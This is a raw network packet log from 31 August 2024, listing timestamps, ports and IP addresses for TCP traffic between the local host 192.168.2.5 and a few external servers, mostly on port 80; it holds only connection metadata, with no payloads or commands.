Aug 31, 2024 15:44:18.605966091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.605971098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.605993032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.606004953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.606014013 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.606043100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.606070042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.606081963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.606127977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.606925964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.606936932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.606946945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.606991053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.607043028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607053995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607064962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607095003 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.607112885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.607177019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607187986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607198954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607208967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607223034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607223988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.607234955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607249975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607255936 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.607261896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607271910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.607275009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.607285976 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.607316017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.608376980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608387947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608398914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608433962 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.608460903 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.608465910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608475924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608490944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608501911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608506918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.608517885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.608521938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608532906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608542919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.608542919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608553886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608566046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608575106 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.608582020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608592033 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.608593941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608604908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.608608961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.608638048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.608664036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.626382113 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.637640953 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.637700081 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.637768984 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.637809992 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.637840986 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.637851954 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.637861013 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.637912035 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.638071060 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.638081074 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.638089895 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.638114929 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.638134003 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.669150114 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:18.682229042 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:18.687761068 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:18.693464994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693479061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693490028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693500996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693545103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.693578959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.693639040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693650961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693660975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693670034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693706036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.693732977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.693944931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693955898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693967104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693978071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.693994999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694003105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.694005013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694016933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694025993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694031000 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.694047928 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.694133043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.694305897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694355965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.694468975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694479942 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694489002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694500923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694509983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694520950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694524050 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.694534063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.694556952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.694569111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.695066929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695151091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.695225000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695235014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695245981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695255041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695266008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695276976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695285082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.695288897 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695302010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695312977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.695319891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695329905 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695333004 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.695363998 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.695375919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695385933 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.695389032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695400953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695441008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.695543051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695554018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.695595980 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.696638107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696647882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696659088 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696671009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696680069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696691990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696702957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696712017 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.696743011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.696798086 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696806908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696816921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696824074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696832895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696855068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.696871042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.696952105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696962118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.696973085 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697021961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.697021961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.697103977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697118044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697127104 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697151899 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.697175026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.697413921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697463036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.697577953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697588921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697602987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697623014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697640896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697643995 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.697652102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697663069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697671890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697673082 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.697683096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697694063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697700977 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.697705030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697715998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697727919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.697736025 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.697736025 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.697757006 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.697782040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.698609114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698617935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698628902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698640108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698651075 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698657036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.698661089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698668957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.698698997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.698741913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698753119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698765039 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698780060 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.698807955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.698924065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698935032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698949099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698966980 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698977947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698985100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.698988914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.698992014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.698999882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699011087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699019909 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699031115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699042082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699052095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699062109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699071884 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699079990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699081898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699093103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699093103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699093103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699110031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699141026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699480057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699491024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699500084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699506044 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699537992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699584961 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699637890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699651003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699661016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699670076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699680090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699680090 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699691057 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699697971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699702024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699727058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699759007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.699939966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699950933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699961901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699973106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.699995041 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.700018883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.700587034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700598955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700609922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700620890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700633049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700659037 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.700690031 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.700721025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700733900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700743914 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700754881 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700764894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700776100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700776100 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.700788021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700793028 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.700800896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700815916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.700834036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.700875998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700887918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700898886 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.700932026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.700944901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.726708889 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.726718903 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.726769924 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.783548117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.783560038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.783570051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.783602953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.783620119 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.783629894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.783636093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.783642054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.783655882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.783663034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.783669949 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.783679008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.783680916 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.783690929 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.783700943 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.783701897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.783711910 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.783740044 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.783740997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.783770084 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.783873081 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.783915043 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.784101963 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784111977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784128904 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.784138918 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.784147024 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:18.784152985 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.784157991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784168005 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784181118 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:18.784181118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784202099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.784212112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784220934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784226894 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.784231901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784235954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.784243107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784250975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.784265041 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.784288883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.784527063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784583092 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784590006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784600973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784610033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784627914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.784650087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784656048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.784661055 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784672976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784681082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.784713984 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.785372972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785382986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785393953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785418987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.785420895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785432100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785442114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:18.785444021 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.785475969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:18.785495043 CEST	49727	80	192.168.2.5	52.212.52.84
